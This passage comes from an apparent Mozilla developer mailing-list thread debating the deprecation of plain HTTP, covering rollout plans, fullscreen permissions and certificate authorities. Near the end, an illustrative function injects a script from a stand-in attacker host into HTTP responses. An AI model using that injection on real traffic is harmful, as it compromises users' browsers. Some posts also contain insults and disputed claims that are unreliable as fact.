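  return digest.readUInt32BE(0) % 100;
}

// Hypothetical ramp: 1% at launch, 51% a month later, 100% after two.
const RAMP: Array<[Date, number]> = [
  [new Date("2015-06-01"), 1],
  [new Date("2015-07-01"), 51],
  [new Date("2015-08-01"), 100],
];

function policyEnforced(origin: string, now: Date): boolean {
  let percent = 0;
  for (const [start, pct] of RAMP) {
    if (now.getTime() >= start.getTime()) percent = pct;
  }
  return originBucket(origin) < percent;
}

// A site owner can compute their own enforcement date the same way:
console.log(policyEnforced("http://example.com", new Date("2015-07-15")));
```

Because the bucket is a pure function of the origin, a webmaster can predict exactly when their site crosses the threshold, which is the property the proposal relies on.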
On Sat, May 2, 2015 at 2:20 AM, <pyalot@gmail.com> wrote: > > In summary, you're batshit insane, power hungry, and mad, and you're using doublespeak at its finest. Please refrain from further discussion until you can avoid making crude personal attacks such as these. Nick
On Sat, May 2, 2015 at 11:57 AM, Nicholas Nethercote <n.nethercote@gmail.com> wrote: > Please refrain from further discussion until you can avoid making > crude personal attacks such as these. I now mandate that you (and everyone you know) shall only do Ethernet via carrier pigeons. There are great advantages to doing this, and I can recommend a number of first-rate pigeon breeders who will sell you pigeons bred for that purpose. I will not discuss with you any notion that pigeons shit onto everything and that costs might rise because pigeons are more expensive to keep than a copper line. Obviously you're a pigeon refusenik and a preventer of great progress. My mandate for pigeons is binding and will come into effect because I happen to have a controlling stake in all utility companies, and come mid-2015 copper lines will be successively cut. Please refrain from disagreeing with my mandate in vulgar terms; also, I refuse any notion that using pigeons for Ethernet by mandate is batshit insane (they're pigeons, not bats, please).
You should never force HTTPS. The wins are rather subjective and hard to confirm, but using HTTPS causes problems for the regular webmaster. Websites will be slower on average. Webmasters need better hardware or have to pay more to their hosting provider. HTTPS support is not always possible. For example, some CDNs can't support HTTPS in some specific modes. Third-party resources linked in HTML can lack HTTPS support, which will cause the website to work incorrectly over HTTPS. And you need to monitor this forever... for all links on the website! This point is valid for a huge percentage of websites. By enabling HTTPS-only you can easily lose 20% of visitors; not all browsers support your certificate. HTTPS library vulnerabilities can lead to the website's origin server being hacked. The problem here is that these libraries are code executed directly on the server. If there is a vulnerability, you can not only decrypt the traffic but also execute code on the server. Certificates are just bundles of problems: revocation, revalidation, library deprecation. And it's worth mentioning that the certificate system makes the web centralized. When someone visits your HTTPS website, it basically queries some other central server. If someone controls this server, he can get information about all your visitors. And that's shocking, I think. I am not against encryption, but do not FORCE it. HTTP is not LEGACY; it's HTTP, the protocol which should be here forever. It's good, fast, and well enough. It's really a tricky question whether HTTPS is more secure than HTTP. Encryption sometimes helps to prevent injections, but it's rather easy to bypass that. Can the NSA decrypt your HTTPS? Most probably yes. Can the webmaster of a website spy on you over HTTPS? Yes, and it's even easier with HTTPS and HSTS because of the HSTS super cookie. Does HTTPS protect your password? Well, there is a chance, but if you think that HTTPS is a magic cure, you are a complete idiot. My vote would be to never use your browser if you deprecate HTTP. It's very easy to find an alternative or to fork your code, so think for yourself how much such a decision can cost you. I also want to say this to the Chrome dev team. The Internet lives on its developers. If you start to do shit things, you will be replaced.
On Sun, May 3, 2015 at 1:51 PM, <mofforg@gmail.com> wrote: > My vote would be to never use your browser if you deprecate HTTP. It's > very easy to find an alternative or to fork your code, so think for yourself > how much such a decision can cost you. I also want to say this to the Chrome > dev team. The Internet lives on its developers. If you start to do shit > things, you will be replaced. This has been happening on the Internet in China. I would suggest you use "360 Secure Browser", one of the major browsers in China. They completely consider the experience of developers and users. Their browser allows users to access a website even if the website provides a broken certificate :) - Xidorn
On Sunday, May 3, 2015 at 5:39:55 AM UTC+3, Xidorn Quan wrote: > This has been happening on the Internet in China. I would suggest you use > "360 Secure Browser", one of the major browsers in China. They completely > consider the experience of developers and users. Their browser allows users > to access a website even if the website provides a broken certificate :) > > - Xidorn In the usual situation, allowing users to access a website even if the website provides a broken certificate is OK. The truth is that this usually happens by mistake of the webmaster, not when someone tries to hack you. However, what Chrome & Firefox do is better, I think: give the user a choice. Basically, to shorten my message - if Mozilla deprecates HTTP, we will deprecate Mozilla.
On Sun, May 3, 2015 at 2:46 PM, <mofforg@gmail.com> wrote: > On Sunday, May 3, 2015 at 5:39:55 AM UTC+3, Xidorn Quan wrote: > > This has been happening on the Internet in China. I would suggest you use > > "360 Secure Browser", one of the major browsers in China. They completely > > consider the experience of developers and users. Their browser allows > > users to access a website even if the website provides a broken certificate :) > > In the usual situation, allowing users to access a website even if the website > provides a broken certificate is OK. The truth is that this usually happens by > mistake of the webmaster, not when someone tries to hack you. However, what > Chrome & Firefox do is better, I think: give the user a choice. > > Basically, to shorten my message - if Mozilla deprecates HTTP, we will > deprecate Mozilla. I don't think anyone will ever completely drop support for HTTP. What we probably will do, at the very most, is treat HTTP websites just like websites that provide a broken certificate. - Xidorn
On Sunday, May 3, 2015 at 6:06:08 AM UTC+3, Xidorn Quan wrote: > I don't think anyone will ever completely drop support for HTTP. What we > probably will do, at the very most, is treat HTTP websites just like > websites that provide a broken certificate. > > - Xidorn It's the same as dropping it, because regular people will become aware, then learn the difference between https and http, and switch to https by force just to not see the ****ing warning. HTTP was not made to be encrypted, and showing warnings on it is stupid.
On 01/05/15 19:02, Matthew Phillips wrote: > You must have missed my original email: > It's paramount that the web remain a frictionless place where creating a > website is dead simple. That is not true today of people who want to run their own hosting. So people who want "frictionless" use blogspot.com, or one of the thousands of equivalent sites in many different jurisdictions, to say what they want to say. In an HTTPS future, such sites would simply provide HTTPS for their users. Gerv
On 03/05/15 03:39, Xidorn Quan wrote: > This has been happening on the Internet in China. I would suggest you use > "360 Secure Browser", one of the major browsers in China. They completely > consider the experience of developers and users. Their browser allows users > to access a website even if the website provides a broken certificate :) Translation: their browser makes MITM attacks much easier. Gerv
On Mon, May 4, 2015 at 10:04 PM, Gervase Markham <gerv@mozilla.org> wrote: > On 03/05/15 03:39, Xidorn Quan wrote: > > This has been happening on the Internet in China. I would suggest you use > > "360 Secure Browser", one of the major browsers in China. They completely > > consider the experience of developers and users. Their browser allows > > users to access a website even if the website provides a broken certificate :) > > Translation: their browser makes MITM attacks much easier. I think Xidorn was being sarcastic :-) Rob
On 5/2/15 05:25, Florian Bösch wrote: > I now mandate that you (and everyone you know) shall only do Ethernet > via carrier pigeons. There are great advantages to doing this, and > I can recommend a number of first-rate pigeon breeders who will sell > you pigeons bred for that purpose. [...] Please refrain from > disagreeing with my mandate in vulgar terms; also, I refuse any notion > that using pigeons for Ethernet by mandate is batshit insane (they're > pigeons, not bats, please). It's clear you didn't see it as such, but Nicholas was trying to do you a favor. You obviously have input you'd like to provide on the topic, and the very purpose of this thread is to gather input. If you show up with well-reasoned arguments in a tone that assumes good faith, there's a real chance for a conversation here where people reach a common understanding and potentially change certain aspects of the outcome. If all you're willing to do is hurl vitriol from the sidelines, you're not making a difference. Even if you have legitimate and well-thought-out points hidden in the venom, no one is going to hear them. Nicholas, like me, would clearly prefer that the time of people on this mailing list be spent conversing with others who want to work for a better future rather than with those who simply want to be creatively abusive. You get to choose which one you are. -- Adam Roach Principal Platform Engineer abr@mozilla.com +1 650 903 0800 x863
On Monday, May 4, 2015 at 9:40:08 AM UTC-4, Adam Roach wrote: > On 5/2/15 05:25, Florian Bösch wrote: > > I now mandate that you (and everyone you know) shall only do Ethernet > > via carrier pigeons. [...] > > It's clear you didn't see it as such, but Nicholas was trying to do you > a favor. > [...] > If all you're willing to do is hurl vitriol from the sidelines, you're > not making a difference. Even if you have legitimate and > well-thought-out points hidden in the venom, no one is going to hear > them. [...] You get to choose which one you are. > > -- > Adam Roach > Principal Platform Engineer > abr@mozilla.com > +1 650 903 0800 x863 "Nothing goes over my head! My reflexes are too fast, I would catch it." -- Drax the Destroyer
I agree HTTPS makes information safer and protects its integrity, making it (once again) safer. However: 1) Are the benefits worth the millions of man-hours and countless dollars this will cost? 2) Why is Mozilla suddenly everyone's nanny? - Shawn On 5/1/15, 2:44 PM, "Joseph Lorenzo Hall" <joe@cdt.org> wrote: > On Fri, May 1, 2015 at 2:37 PM, Patrick McManus <pmcmanus@mozilla.com> wrote: > > It is, after all, likely stored in cleartext on each computer. [...] > > Yes, I'll add something Patrick knows very well, but just to hammer it > home: HTTPS as transport protection isn't just about confidentiality > but also about integrity of the transport. > > So even if those of you out there are saying "The web doesn't have > much private stuff! Jeez!", the web sure has a lot of stuff that is > highly dynamic, with JavaScript and other active content. That stuff > needs to be protected in transit lest the Great Cannon or any number of > user-hostile crap on the net start owning your UAs, even if you don't > think the content needs to be private. > > best, Joe
On Mon, May 4, 2015 at 3:38 PM, Adam Roach <abr@mozilla.com> wrote: > others who want to work for a better future A client of mine whom I asked whether they could move to HTTPS with their server stated that they do not have the time and resources to do so. So the fullscreen button will just stop working. That's an amazing better future right there. You didn't get what you want (HTTPS), I didn't get what I want (a cool feature working), and the client didn't get what they wanted (a feature working that they paid money to integrate). Lose/lose/lose situations are pretty much the best kind of better future I can think of. Congrats.
On 5/4/15 11:24, Florian Bösch wrote: > On Mon, May 4, 2015 at 3:38 PM, Adam Roach <abr@mozilla.com> wrote: > > others who want to work for a better future > > A client of mine whom I asked whether they could move to HTTPS with their > server stated that they do not have the time and resources to do so. So the > fullscreen button will just stop working. That's an amazing better > future right there. You have made some well-thought-out contributions to conversations at Mozilla in the past. I'm a little sad that you're choosing not to participate in a useful way here. -- Adam Roach Principal Platform Engineer abr@mozilla.com +1 650 903 0800 x863
On Mon, May 4, 2015 at 6:33 PM, Adam Roach <abr@mozilla.com> wrote: > You have made some well-thought-out contributions to conversations at > Mozilla in the past. I'm a little sad that you're choosing not to > participate in a useful way here. I think this is a pretty relevant contribution. Obviously it's not the kind of story you want to hear. It's also not the story I want to hear. But we can't pick and choose what we get. And this is what you'll get: I polled a client of mine that has a small web property containing a WebGL widget with a fullscreen button. Here is what I wrote that client: > I'd like to inform you that it's likely that the fullscreen button will > break in Google Chrome and Firefox in the foreseeable future (mid > 2015-2016). For security reasons, browsers want to disable fullscreen if you > are not serving the website over HTTPS. > Starting mid-2015, a new SSL certificate authority will offer free > certificates (https://letsencrypt.org/). > Do you think you could host your site over HTTPS to prevent the fullscreen > button breaking? If required, I could also remove the fullscreen button. The client's response below: > I appreciate the heads up. > Redesigning our site to use HTTPS is probably possible, but I currently do > not have the time and resources to undertake that task. > Would it be possible to let me know when you get the information that the > first production Chrome or Firefox is released? At that time I can > certainly disable the fullscreen function myself, as this is real easy to do > in your .js file. So yeah, again, congrats.
On Mon, May 4, 2015 at 9:39 AM, Florian Bösch <pyalot@gmail.com> wrote: > On Mon, May 4, 2015 at 6:33 PM, Adam Roach <abr@mozilla.com> wrote: > > You have made some well-thought-out contributions to conversations at > > Mozilla in the past. I'm a little sad that you're choosing not to > > participate in a useful way here. > > I think this is a pretty relevant contribution. [...] > > The client's response below: > > > I appreciate the heads up. > > Redesigning our site to use HTTPS is probably possible, but I currently do > > not have the time and resources to undertake that task. [...] > > So yeah, again, congrats. This would be more useful if you explained what they considered the cost of converting to HTTPS, so we could discuss ways to ameliorate that cost. With that said, fullscreen is actually a good example of a feature which really benefits from being over HTTPS. Consider what happens if the user grants a persistent permission to site X to use fullscreen. At that point, any network attacker can take over the user's entire screen without their consent by pretending to be site X. Note that this is true *even if* the real version of site X doesn't do anything sensitive. So I think it should be fairly easy to understand why we want to limit access to fullscreen over HTTP. -Ekr
On 05/04/2015 09:39 AM, Florian Bösch wrote: > Here is what I wrote that client: > > [...] For security reasons, browsers want to disable fullscreen if you >> are not serving the website over HTTPS. Are you sure this is true? Where has it been proposed to completely disable fullscreen for non-HTTPS connections? (I think there's a strong case for disabling *persistent* fullscreen permission, for the reasons described in ekr's response to you here. I haven't seen any proposal for going beyond that, but I might've missed it.) ~Daniel
On Mon, May 4, 2015 at 11:00 AM, Daniel Holbert <dholbert@mozilla.com> wrote: > (I think there's a strong case for disabling *persistent* fullscreen > permission, for the reasons described in ekr's response to you here. I > haven't seen any proposal for going beyond that, but I might've missed it.) A little birdy told me that that is planned.
On Mon, May 4, 2015 at 10:52 AM, Florian Bösch <pyalot@gmail.com> wrote: > On Mon, May 4, 2015 at 7:43 PM, Eric Rescorla <ekr@rtfm.com> wrote: > >> This would be more useful if you explained what they considered the cost >> of converting to HTTPS, so we could discuss ways to ameliorate that cost. > > I agree. But I don't get to choose what answers I get. I can press the > point out of interest. But even if I get to some satisfactory outcome there > that way, it's still effort/money to expend; there are dozens of clients from > the past and more in the future that I'll have to have the same conversation > with. For the ones from the past, in many cases even in the ideal case (not > much effort and everybody knows what's to be done), the budget for those > deployments is used up. There's no new budget coming. They're not going to > get fixed, no matter the good intentions of everybody. At the end of the day, > work is not free. I'm going to refer you at this point to the W3C HTML design principles' priority of constituencies (http://www.w3.org/TR/html-design-principles/#priority-of-constituencies): "In case of conflict, consider users over authors over implementors over specifiers over theoretical purity. In other words costs or difficulties to the user should be given more weight than costs to authors; which in turn should be given more weight than costs to implementors; which should be given more weight than costs to authors of the spec itself, which should be given more weight than those proposing changes for theoretical reasons alone. Of course, it is preferred to make things better for multiple constituencies at once." Again, we're happy to look at ways to ease this transition, but right now you're not offering any. >> With that said, fullscreen is actually a good example of a feature which >> really benefits from being over HTTPS. Consider what happens if the user >> grants a persistent permission to site X to use fullscreen. At that point, >> any network attacker can take over the user's entire screen without their >> consent by pretending to be site X. Note that this is true *even if* the >> real version of site X doesn't do anything sensitive. So, I think it should >> be fairly easy to understand why we want to limit access to fullscreen over >> HTTP. > > I don't agree with that reasoning. But my agreeing with it or not doesn't > change the outcome I have tested in the real world. I don't really understand what you're talking about here. I think this is a fairly straightforward security analysis. I appreciate that it makes people sad that we don't want to let them do unsafe things, but that doesn't make them safe. If you have a security analysis to offer in this case about why fullscreen over HTTP is safe, I'd be happy to hear it. -Ekr
On Mon, May 4, 2015 at 8:06 PM, Eric Rescorla <ekr@rtfm.com> wrote: > > I'm going to refer you at this point to the W3C HTML design principles' > priority of constituencies > (http://www.w3.org/TR/html-design-principles/#priority-of-constituencies). > [...] > Again, we're happy to look at ways to ease this transition, but right now > you're not offering any. You've set out on a course that leaves no room to offer any. You're going to break things. You've decided to break things and damn the consequences. You've decided to synchronize breaking things so that users have no UA to flee to. And you've decided to hide your breaking of things so that the shitstorm isn't going to come all at once. You're trying to delegate the cost of fixing the things you broke for users to authors, who in many cases cannot bear that cost even if they wanted to. I, as an author, tell you that this isn't going to go over smoothly. In fact, it's going to go over pretty terribly. Coercing everybody to conform with your greater goal (tm) from a situation where many cannot comply always does.
On Mon, May 4, 2015 at 12:59 PM, Florian Bösch <pyalot@gmail.com> wrote: > On Mon, May 4, 2015 at 8:06 PM, Eric Rescorla <ekr@rtfm.com> wrote: >> >> I'm going to refer you at this point to the W3C HTML design principles' >> priority of constituencies >> (http://www.w3.org/TR/html-design-principles/#priority-of-constituencies). >> [...] >> Again, we're happy to look at ways to ease this transition, but right now >> you're not offering any. > > You've set out on a course that leaves no room to offer any. You're going > to break things. You've decided to break things and damn the consequences. > You've decided to synchronize breaking things so that users have no UA to > flee to. And you've decided to hide your breaking of things so that the > shitstorm isn't going to come all at once. You're trying to delegate the > cost of fixing the things you broke for users to authors, who in many cases > cannot bear that cost even if they wanted to. > > I, as an author, tell you that this isn't going to go over smoothly. In > fact, it's going to go over pretty terribly. Coercing everybody to > conform with your greater goal (tm) from a situation where many cannot > comply always does. Thanks for clarifying that you're not interested in engaging at a technical level. Feel free to flame on. -Ekr
On Tue, May 5, 2015 at 6:04 AM, Martin Thomson <mt@mozilla.com> wrote: > On Mon, May 4, 2015 at 11:00 AM, Daniel Holbert <dholbert@mozilla.com> > wrote: > > (I think there's a strong case for disabling *persistent* fullscreen > > permission, for the reasons described in ekr's response to you here. I > > haven't seen any proposal for going beyond that, but I might've missed > it.) > > A little birdy told me that that is planned. I'm currently working on fullscreen. I believe our current plan is neither disabling fullscreen on HTTP nor disabling persistent permission for it. Instead, we're going to remove the permission bit for fullscreen, which means a website can always enter fullscreen as long as it is initiated from user input. We plan to use a transition animation to make entering fullscreen obvious to users, so that they are freed from the burden of deciding whether a website is trustworthy. - Xidorn
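As a sketch of the gesture-gated model Xidorn describes (no permission bit; fullscreen only from inside a user-input handler), here is what that looks like from the page's side. This uses today's unprefixed, promise-returning Fullscreen API for brevity - in 2015 Gecko this was the prefixed mozRequestFullScreen - and the element ids are hypothetical.

```typescript
// Gesture-gated fullscreen: the request happens inside a click handler,
// which counts as user activation; no persistent grant is involved.
const player = document.getElementById("player")!;
const button = document.getElementById("fullscreen-button")!;

button.addEventListener("click", async () => {
  try {
    // The browser's own transition animation (not the page) is what
    // makes the mode change obvious to the user.
    await player.requestFullscreen();
  } catch (err) {
    console.warn("Fullscreen request was refused:", err);
  }
});
```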
On Mon, May 4, 2015 at 1:57 PM, Xidorn Quan <quanxunzhen@gmail.com> wrote: > On Tue, May 5, 2015 at 6:04 AM, Martin Thomson <mt@mozilla.com> wrote: > > > On Mon, May 4, 2015 at 11:00 AM, Daniel Holbert <dholbert@mozilla.com> > > wrote: > > > (I think there's a strong case for disabling *persistent* fullscreen > > > permission, for the reasons described in ekr's response to you here. I > > > haven't seen any proposal for going beyond that, but I might've missed > > it.) > > > > A little birdy told me that that is planned. > > I'm currently working on fullscreen. I believe our current plan is neither > disabling fullscreen on HTTP nor disabling persistent permission for it. > > Instead, we're going to remove the permission bit for fullscreen, which means > a website can always enter fullscreen as long as it is initiated from user > input. We plan to use a transition animation to make entering fullscreen > obvious to users, so that they are freed from the burden of deciding whether > a website is trustworthy. This is not what I gathered from the notes Richard Barnes forwarded me. Rather, I had the impression that we were going to make the animation more aggressive *and* require a permissions prompt every time for HTTP. Richard? -Ekr
We're adding UX to clearly indicate http:// or https:// in fullscreen while still meeting the user desire for secure one-click-to-fullscreen. The latest and greatest proposal is posted here: https://bugzilla.mozilla.org/show_bug.cgi?id=1129061 --Jet On Mon, May 4, 2015 at 2:04 PM, Eric Rescorla <ekr@rtfm.com> wrote: > On Mon, May 4, 2015 at 1:57 PM, Xidorn Quan <quanxunzhen@gmail.com> wrote: > > [...] > > Instead, we're going to remove the permission bit for fullscreen, which > > means a website can always enter fullscreen as long as it is initiated > > from user input. We plan to use a transition animation to make entering > > fullscreen obvious to users, so that they are freed from the burden of > > deciding whether a website is trustworthy. > > This is not what I gathered from the notes Richard Barnes forwarded me. > Rather, I had the impression that we were going to make the animation more > aggressive *and* require a permissions prompt every time for HTTP. > > Richard? > > -Ekr
Great! Without getting too deep into the exact details about animation / notifications / permissions, it sounds like Florian's concern RE "browsers want to disable fullscreen if you are not serving the website over HTTPS" may be unfounded, then. (Unless Florian or Martin have some extra information that we're missing.) ~Daniel On 05/04/2015 02:55 PM, Jet Villegas wrote: > We're adding UX to clearly indicate http:// or https:// in fullscreen > while still meeting the user desire for secure one-click-to-fullscreen. > The latest and greatest proposal is posted here: > > https://bugzilla.mozilla.org/show_bug.cgi?id=1129061 > > --Jet > [...]
On Tue, May 5, 2015 at 12:03 AM, Daniel Holbert <dholbert@mozilla.com> wrote: > Without getting too deep into the exact details about animation / > notifications / permissions, it sounds like Florian's concern RE > "browsers want to disable fullscreen if you are not serving the website > over HTTPS" may be unfounded, then. > > (Unless Florian or Martin have some extra information that we're missing.) I was responding to the OP's comment about restricting features (such as fullscreen); I have no more information than that. Yes, if the permission dialog could be done away with altogether, and appropriate UX could be devised to make the fullscreen change difficult to miss, and if that made it possible to have fullscreen functionality regardless of http or https, that would make me happy. It would also take care of another UX concern of mine (permission-dialog creep), particularly in the case where an iframe with fullscreen functionality is embedded and, for instance, the YouTube player re-polls permission to go fullscreen on every domain it's embedded in (which from a user's point of view just doesn't make any sense).
The additional expense of HTTPS arises from the significantly higher cost to the service owner of protecting it against attack in order to maintain service availability (the third side of the security CIA triad, the one that gets forgotten). Encryption should be activated only after BOTH parties have mutually authenticated. Why establish an encrypted transport to an unknown attacker? This might be done with mutual authentication in TLS (which nobody does), by creating a separate connection after identities are authenticated, or by using an app with embedded identity. I'll be at RIPE70. Steve On Monday, April 13, 2015 at 3:57:58 PM UTC+1, Richard Barnes wrote: > There's pretty broad agreement that HTTPS is the way forward for the web. > [...] > In order to encourage web developers to move from HTTP to HTTPS, I would > like to propose establishing a deprecation plan for HTTP without security. > [...]
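For reference, the mutual authentication Steve mentions does exist in TLS today as client certificates, even if almost nobody deploys it on the public web. A minimal sketch of a server that refuses to exchange application data until both sides have authenticated, using Node's standard https options; the file names and CA bundle are hypothetical:

```typescript
// Mutual-TLS sketch: the server demands a client certificate during the
// handshake, so encryption only carries data between authenticated peers.
import { readFileSync } from "fs";
import { createServer } from "https";

const server = createServer(
  {
    key: readFileSync("server-key.pem"),
    cert: readFileSync("server-cert.pem"),
    ca: readFileSync("client-ca.pem"), // CA that signs client certs
    requestCert: true,           // ask the client for a certificate
    rejectUnauthorized: true,    // refuse clients the CA didn't sign
  },
  (req, res) => {
    res.end("both sides authenticated before any application data\n");
  }
);

server.listen(8443);
```

The catch, as the next reply notes, is that this model requires every visitor to hold an identity certificate, which is workable for closed systems but not for an open, anonymous web.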
On 2015-05-05 4:59 AM, snash@arbor.net wrote: > Encryption should be activated only after BOTH parties have mutually authenticated. > Why establish an encrypted transport to an unknown attacker? A web you have to uniquely identify yourself to participate in is really not open or free for an awful lot of people. And if we had a reliable way of identifying attacks and attackers at all, much less in some actionable way, this would all be a much simpler problem. It is, just as one example among thousands, impossible to know if your wifi is being sniffed or not. - mhoye
It's absolutely true for hosting yourself today. The only thing even slightly difficult is setting up dynamic DNS. On Mon, May 4, 2015, at 06:01 AM, Gervase Markham wrote: > On 01/05/15 19:02, Matthew Phillips wrote: > > You must have missed my original email: > > It's paramount that the web remain a frictionless place where creating a > > website is dead simple. > > That is not true today of people who want to run their own hosting. So > people who want "frictionless" use blogspot.com, or one of the thousands > of equivalent sites in many different jurisdictions, to say what they > want to say. > > In an HTTPS future, such sites would simply provide HTTPS for their > users. > > Gerv
On Wed, May 6, 2015 at 2:04 PM, Matthew Phillips <matthew@matthewphillips.info> wrote: > It's absolutely true for hosting yourself today. The only thing even > slightly difficult is setting up dynamic DNS. And in a future where certificates are issued without cost over a protocol, there's no reason setting up a secure server yourself will be difficult. HTTP will not disappear overnight, and we'll have plenty of time to get all the moving pieces in order to make this great and overall a better web for end users. (Who will have fewer impossible trust decisions to endure.) -- https://annevankesteren.nl/
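The protocol Anne alludes to is ACME, the automation behind Let's Encrypt. Its simplest domain-validation step (the http-01 challenge) just asks the applicant to serve a CA-supplied token from a well-known path on port 80. A simplified sketch; the token value is a hypothetical placeholder, and the account-key thumbprint that real ACME appends to the response is omitted:

```typescript
// Simplified http-01 responder: prove control of the host by serving
// the CA's token back at the path the CA will fetch.
import * as http from "http";

const token = "token-from-the-ca"; // hypothetical placeholder

http.createServer((req, res) => {
  if (req.url === `/.well-known/acme-challenge/${token}`) {
    res.writeHead(200, { "Content-Type": "text/plain" });
    // Real ACME serves token + "." + account-key thumbprint here.
    res.end(token);
  } else {
    res.statusCode = 404;
    res.end();
  }
}).listen(80);
```

Because the whole exchange is machine-driven, a client can request, validate, and install a certificate with no human in the loop, which is what collapses the cost argument.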
On 05/01/2015 01:50 PM, oliver@omattos.com wrote: > When plans like this aren't rolled out across all browsers together, users inevitably come across a broken site and say "Firefox works with this site, but Safari gives a warning. Safari must be broken". Better security is punished. > > Having this determined by a browser release is also bad. "My up-to-date Firefox is broken, but my old Safari works. Updating breaks things and must be bad!" Secure practices are punished. > > All browsers could change their behaviour on a specific date and time. But that would lead to stampedes of webmasters having issues all at once. And if there's any unforeseen compatibility issue, you just broke the entire world. Not so great. > > So might I suggest that the best rollout plan is to apply policies based on a hash of the origin and a timestamp. I.e., on a specific date, 1% of sites have the new policies enforced, while 99% do not. Then a month later, it's up to 51%, and another month later it's up to 100%. The proposal I understood from this thread involves breaking precisely 0% of existing sites. So the flag day would only be relevant to in-development sites using new features only available in development browser builds.
This is a good idea but a terrible implementation. I already need someone else's approval (a registrar's) to run a website (unless I want visitors to remember my IP addresses). NOW I will need ANOTHER someone to approve it as well (a CA), unless I want visitors to click through a bunch of security "errors". We shouldn't be ADDING authorities required to make websites. The web is open and free, and this proposal adds authority to a select few who can dictate what's a "valid" site and what isn't.
Can't people use Let's Encrypt to obtain a certificate for free without the usual CA run-around? https://letsencrypt.org/getting-started/ "Let's Encrypt is a free, automated, and open certificate authority brought to you by the non-profit Internet Security Research Group (ISRG)." On Tue, Dec 20, 2016 at 6:38 AM, <cody.wohlers@gmail.com> wrote: > This is a good idea but a terrible implementation. I already need someone > else's approval (a registrar's) to run a website (unless I want visitors to > remember my IP addresses). NOW I will need ANOTHER someone to approve it > as well (a CA), unless I want visitors to click through a bunch > of security "errors". > > We shouldn't be ADDING authorities required to make websites. The web is > open and free, and this proposal adds authority to a select few who can > dictate what's a "valid" site and what isn't.
Absolutely! Let's Encrypt sounds awesome, super-easy, and the price is right. But I'm thinking of cases like Lavabit, where a judge forced the site operator to release the private key. Or the opposite - could a government restrict access to a site by forcing the CA to revoke its certificates? I guess you could just get another certificate from another CA, but what if they are all ordered to revoke you - like in some future world government or something... This example is extreme, but security is not about the norm; it's about the fringe cases. I just wish we could have an encryption scheme that doesn't need any third-party authority before we start punishing those who don't use it. That's all. On Tuesday, 20 December 2016 10:47:33 UTC-7, Jim Blandy wrote: > Can't people use Let's Encrypt to obtain a certificate for free without the > usual CA run-around? > > https://letsencrypt.org/getting-started/ > > "Let's Encrypt is a free, automated, and open certificate authority brought > to you by the non-profit Internet Security Research Group (ISRG)."
On Tue, Dec 20, 2016 at 10:28 AM, Cody Wohlers <cody.wohlers@gmail.com> wrote: > Absolutely! Let's Encrypt sounds awesome, super-easy, and the price is > right. > > But I'm thinking of cases like Lavabit, where a judge forced the site > operator to release the private key. Or the opposite - could a government > restrict access to a site by forcing the CA to revoke its certificates? I > guess you could just get another certificate from another CA, but what if > they are all ordered to revoke you - like in some future world government > or something... Certainly a government could do that, but it's easier to just go after the DNS. > This example is extreme, but security is not about the norm; it's about the > fringe cases. I just wish we could have an encryption scheme that doesn't > need any third-party authority before we start punishing those who don't > use it. That's all. As long as sites are identified by domain names and want those names to be tied to real-world identities, I don't see anything like that on the horizon (i.e., I'm not aware of any technology which would let you do it). -Ekr
Richard Barnes wrote: > There's pretty broad agreement that HTTPS is the way forward for the web. > In recent months, there have been statements from IETF [1], IAB [2], W3C > [3], and even the US Government [4] calling for universal use of > encryption, which in the case of the web means HTTPS. > > In order to encourage web developers to move from HTTP to HTTPS, I would > like to propose establishing a deprecation plan for HTTP without security. With all due respect, the HTTP->HTTPS move *isn't* entirely the web developer's choice but the web server administrator's choice (unless one person is wearing both hats). Just because the US Government is calling for encryption (i.e., HTTPS over HTTP), it doesn't mean people can and/or will do it. Why? Why do people need to be forced to use HTTPS when it's overkill for their website? I mean, would a run-of-the-mill site with no shopping require HTTPS? Like, e.g., http://www.ambrosia-oysterbar.com/catalog/index.php HTTPS is a secured method of transporting information. For the above website, HTTPS would make absolutely no sense and would be akin to getting BRINKS to transport a T-bone steak dinner to you. Can you do that? Sure, possibly, if BRINKS doesn't ignore you outright. Why would you do that? Like everything, HTTPS is a tool, and it's a bad idea to force people to use it when they don't need it. When do they need it? Who decides when they need it? Certainly not you, or anyone else other than themselves. So, like the NetworkInterface issue... please stop wasting resources doing these 'busy' things when you can be doing something else that gives more choice to the user. I mean, doing things right vs. doing the right things - I believe it was the late Peter Drucker who wrote that. > Broadly speaking, this plan would entail limiting new features to secure > contexts, followed by gradually removing legacy features from insecure > contexts. Having an overall program for HTTP deprecation makes a clear > statement to the web community that the time for plaintext is over -- it There is nothing wrong with plaintext as long as it isn't something credential-like. Also, what you're doing will only make a clear statement to the web community that you are forcing something on them and limiting THEIR choices for broadcasting their information as they see fit. IOW, "deprecating HTTP" is not a good idea. :ewong
On 12/20/2016 06:20 PM, Edmund Wong wrote: > Richard Barnes wrote: > >> Broadly speaking, this plan would entail limiting new features to secure >> contexts, followed by gradually removing legacy features from insecure >> contexts. Having an overall program for HTTP deprecation makes a clear >> statement to the web community that the time for plaintext is over -- it > There is nothing wrong with plaintext as long as it isn't something > credential-like. Also, what you're doing will only make a clear > statement to the web community that you are forcing something on them > and limiting THEIR choices for broadcasting their information as they > see fit. > > IOW, "deprecating HTTP" is not a good idea. If I have a browser exploit that I can embed in a <script> tag, I can inject it into all of the HTTP network traffic on my LAN. Not so nice if visiting an HTTP website at Starbucks or the public library gets you pwned.
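A conceptual sketch of why this is trivially possible: a plaintext HTTP response carries no integrity protection, so any on-path device (a hostile hotspot, a compromised router) can rewrite the body before the browser sees it. The function below is an illustration, not a working attack; attacker.invalid is a reserved, non-resolvable name.

```typescript
// Illustration only: nothing in plaintext HTTP lets the browser detect
// that a response body was modified in flight.
function tamperedResponse(html: string): string {
  return html.replace(
    "</body>",
    '<script src="http://attacker.invalid/exploit.js"></script></body>'
  );
}
```

Over HTTPS the same modification breaks the TLS record MAC and the connection fails, which is the integrity property Patrick and Joe described earlier in the thread.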
Steve Fink wrote: > On 12/20/2016 06:20 PM, Edmund Wong wrote: >> Richard Barnes wrote: >> [...] >> IOW, "deprecating HTTP" is not a good idea. > > If I have a browser exploit that I can embed in a <script> tag, I can > inject it into all of the HTTP network traffic on my LAN. Not so nice if > visiting an HTTP website at Starbucks or the public library gets you pwned. Point taken. Someone could just as well crack into a server that has HTTPS and hijack it to inject HTTPS-delivered browser exploits. Sure, it's not as simple as injecting them into HTTP traffic, but that could still happen. No amount of HTTPS can prevent your system from being pwned, which is why layered defense (defense in depth) is the best security. In any event, the choice is Mozilla's. Edmund
